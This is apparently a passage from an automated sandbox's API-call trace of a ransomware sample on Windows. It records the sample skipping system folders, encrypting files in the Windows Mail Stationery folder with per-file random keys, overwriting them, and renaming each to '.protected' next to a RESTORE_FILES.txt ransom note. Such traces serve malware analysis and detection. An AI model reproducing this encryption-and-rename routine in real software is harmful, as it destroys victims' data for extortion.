lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.491] CloseHandle (hObject=0x150) returned 1 [0085.492] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.protected") returned 102 [0085.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm.protected")) returned 1 [0085.493] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.493] lstrcmpiW (lpString1="Garden.jpg", lpString2="Windows") returned -1 [0085.493] lstrcmpiW 
(lpString1="Garden.jpg", lpString2="Program Files") returned -1 [0085.493] lstrcmpiW (lpString1="Garden.jpg", lpString2="Program Files (x86)") returned -1 [0085.493] lstrcmpiW (lpString1="Garden.jpg", lpString2="$Recycle.bin") returned 1 [0085.493] lstrcmpiW (lpString1="Garden.jpg", lpString2="System Volume Information") returned -1 [0085.493] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 92 [0085.493] StrStrIW (lpFirst="Garden.jpg", lpSrch=".protected") returned 0x0 [0085.493] lstrcmpW (lpString1="Garden.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0085.493] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.493] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.494] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 92 [0085.494] StrStrW (lpFirst="Garden.jpg", lpSrch=".txt") returned 0x0 [0085.494] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 92 [0085.494] StrStrW (lpFirst="Garden.jpg", lpSrch=".rar") returned 0x0 [0085.494] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\Garden.jpg") returned 92 [0085.494] StrStrW (lpFirst="Garden.jpg", lpSrch=".zip") returned 0x0 [0085.494] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0085.502] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.502] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0085.503] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.503] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.527] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.527] CloseHandle (hObject=0x150) returned 1 [0085.528] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.protected") returned 102 [0085.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\Garden.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg.protected")) returned 1 [0085.528] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.528] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Windows") returned -1 [0085.529] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Program Files") returned -1 [0085.529] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Program Files (x86)") returned -1 [0085.529] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="$Recycle.bin") returned 1 [0085.529] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="System Volume Information") returned -1 [0085.529] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 99 [0085.529] StrStrIW (lpFirst="Green Bubbles.htm", lpSrch=".protected") returned 0x0 [0085.529] lstrcmpW (lpString1="Green Bubbles.htm", lpString2="RESTORE_FILES.txt") returned -1 [0085.529] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.529] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.529] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 99 [0085.529] StrStrW (lpFirst="Green Bubbles.htm", lpSrch=".txt") returned 0x0 [0085.529] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 99 [0085.529] StrStrW (lpFirst="Green Bubbles.htm", lpSrch=".rar") returned 0x0 [0085.529] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 99 [0085.529] StrStrW (lpFirst="Green Bubbles.htm", lpSrch=".zip") returned 0x0 [0085.529] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0085.530] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.530] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0085.536] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.536] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.536] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.536] CloseHandle (hObject=0x150) returned 1 [0085.537] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.protected") returned 109 [0085.537] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm.protected")) returned 1 [0085.537] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.537] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="Windows") returned -1 [0085.537] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="Program Files") returned -1 [0085.537] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="Program Files (x86)") returned -1 [0085.537] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="$Recycle.bin") returned 1 [0085.537] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="System Volume Information") returned -1 [0085.537] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 98 [0085.537] StrStrIW (lpFirst="GreenBubbles.jpg", lpSrch=".protected") returned 0x0 [0085.537] lstrcmpW (lpString1="GreenBubbles.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0085.537] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.538] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x30) returned 1 [0085.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.538] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 98 [0085.538] StrStrW (lpFirst="GreenBubbles.jpg", lpSrch=".txt") returned 0x0 [0085.538] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 98 [0085.538] StrStrW (lpFirst="GreenBubbles.jpg", lpSrch=".rar") returned 0x0 [0085.538] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 98 [0085.538] StrStrW (lpFirst="GreenBubbles.jpg", lpSrch=".zip") returned 0x0 [0085.538] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x1906, lpOverlapped=0x0) returned 1 [0085.541] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe6fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.541] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1906, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x1906, lpOverlapped=0x0) returned 1 [0085.544] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.544] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.545] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.545] CloseHandle (hObject=0x150) returned 1 [0085.546] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.protected") returned 108 [0085.546] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg.protected")) returned 1 [0085.547] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.547] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Windows") returned -1 [0085.547] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Program Files") returned -1 [0085.547] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Program Files (x86)") returned -1 [0085.547] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="$Recycle.bin") returned 1 [0085.547] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="System Volume Information") returned -1 [0085.547] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\Hand Prints.htm") returned 97 [0085.547] StrStrIW (lpFirst="Hand Prints.htm", lpSrch=".protected") returned 0x0 [0085.547] lstrcmpW (lpString1="Hand Prints.htm", lpString2="RESTORE_FILES.txt") returned -1 [0085.547] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.547] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 97 [0085.548] StrStrW (lpFirst="Hand Prints.htm", lpSrch=".txt") returned 0x0 [0085.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 97 [0085.548] StrStrW (lpFirst="Hand Prints.htm", lpSrch=".rar") returned 0x0 [0085.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 97 [0085.548] StrStrW (lpFirst="Hand Prints.htm", lpSrch=".zip") returned 0x0 [0085.548] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xeb, lpOverlapped=0x0) returned 1 [0085.549] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 
| out: lpNewFilePointer=0xffffffff) returned 1 [0085.549] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xeb, lpOverlapped=0x0) returned 1 [0085.550] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.550] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.550] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.550] CloseHandle (hObject=0x150) returned 1 [0085.560] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.protected") returned 107 [0085.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm.protected")) returned 1 [0085.571] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.571] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Windows") returned -1 [0085.571] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Program Files") 
returned -1 [0085.571] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Program Files (x86)") returned -1 [0085.571] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="$Recycle.bin") returned 1 [0085.571] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="System Volume Information") returned -1 [0085.572] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 96 [0085.572] StrStrIW (lpFirst="HandPrints.jpg", lpSrch=".protected") returned 0x0 [0085.572] lstrcmpW (lpString1="HandPrints.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0085.572] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.572] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 96 [0085.572] StrStrW (lpFirst="HandPrints.jpg", lpSrch=".txt") returned 0x0 [0085.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 96 [0085.572] StrStrW (lpFirst="HandPrints.jpg", lpSrch=".rar") returned 0x0 [0085.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\HandPrints.jpg") returned 96 [0085.572] StrStrW (lpFirst="HandPrints.jpg", lpSrch=".zip") returned 0x0 [0085.574] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x107e, lpOverlapped=0x0) returned 1 [0085.592] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffef82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.592] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x107e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x107e, lpOverlapped=0x0) returned 1 [0085.593] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.593] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.593] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.594] CloseHandle (hObject=0x150) returned 1 [0085.594] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.protected") returned 106 [0085.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg.protected")) returned 1 [0085.595] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.595] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Windows") returned -1 [0085.595] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Program Files") returned -1 [0085.595] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Program Files (x86)") returned -1 [0085.595] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="$Recycle.bin") returned 1 [0085.595] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="System Volume Information") returned -1 [0085.595] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 100 [0085.595] StrStrIW (lpFirst="Orange Circles.htm", lpSrch=".protected") returned 0x0 [0085.595] lstrcmpW (lpString1="Orange Circles.htm", lpString2="RESTORE_FILES.txt") returned -1 [0085.595] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.596] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 